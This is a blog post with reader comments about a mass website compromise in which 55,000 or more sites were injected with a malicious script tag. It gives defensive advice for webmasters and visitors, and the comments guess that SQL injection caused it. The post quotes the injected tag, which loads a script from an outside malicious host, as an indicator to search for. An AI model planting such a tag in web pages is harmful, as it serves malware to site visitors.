55,000 Web sites hacked to serve up malware cocktail | Zero Day | ZDNet.com 3


55,000 Web sites hacked to serve up malware cocktail | Zero Day | ZDNet.com

ZDNet is reporting that ScanSafe has found around 55,000 websites that are compromised with malware today.  As of right now, doing a google search for “script src=http://a0v.org/x.js” (the I-Frame tag used in the infection—If this link is clickable DO NOT CLICK IT) results in 107,000 hits.  Some of those are not malicious, but are reporting about the compromise.

What does this mean?  It means that if you’re a webmaster you need to search for this tag.  If your site is listed, you need to scrub your site and reinforce your security measures.  If you’re a web surfer, you need to be careful about where you go.

55,000 or even 107,000 doesn’t sound like a lot of sites in the big picture.  But, if you’re looking for sporting heroes, charities, cruises, information about studying in China, or assisted living facilities (just to name a few types of sites that are compromised) you need to worry.

It appears that at least some of the sites are compromised on their “Contact Us” pages.  So, without actually visiting the sites, I can only guess that the I-Frame is hiding over top of the Submit button on the contact form.  This is a form of “Click-jacking”.

My suggestion is that you use browsers such as Firefox with “No-Script” or other add-ons that block JavaScript and Flash for a while.  With 107,000 sites, it’s going to be a long time before this mess is cleaned up.  And since the number of infected sites is growing—not shrinking, we’re on the early stages of the curve.

If you have to use Internet Explorer, then I suggest turning on Protected Mode and paying close attention to what’s going on.  If you’re looking at a site and it wants to download something, click “No”. If the site doesn’t work properly, you can always refresh and click “Yes”.  I don’t recommend clicking the “Allow on all Websites” option, as this effectively defeats the purpose of Protected Mode.

And you need to make sure your antivirus and antispyware programs are updated and doing their jobs too.  While this malware may be new enough that it’s not detected immediately, the antimalware community will catch up to it.

Tread carefully for a while.  Moreso than you should be already.

Have a great day:)
Patrick.


Leave a comment

Your email address will not be published. Required fields are marked *

3 thoughts on “55,000 Web sites hacked to serve up malware cocktail | Zero Day | ZDNet.com

  • WeWatch

    It appears from reviewing thousands of these sites, that most of them are using .asp or .aspx pages which are generally dynamically generated.

    This leads us to believe that this is probably a SQL injection attack as the dynamically generated pages probably derive their content, or a portion of it, from a back-end database.

    Some of the iframes injected are right in the middle of legitimate lines of html code furthering our theory of the SQL injection.

    That’s just our opinion, we could be wrong

  • PatsComputerServices

    I never thought about that (the SQL injection). My question then is how do you mitigate that? Would using No-Script still work and would using Protected Mode on IE work as well?

    Thanks for stopping by and commenting. I value the insight tremendously.

    Have a great day:)
    Patrick.

  • WeWatch

    Yes both of those strategies would work for this type of attack from the visitors point of view.

    The reason is because the injected code is still a script and some of it that we've seen in this attack, is highly obfuscated. With No-Script on, it stays obfuscated. The asp/aspx code is server side so it will still render the html, but the script is client side so it will not if No-Script is on.

    It's nice that you're so proactive about this for your clients.

    Kudos to you.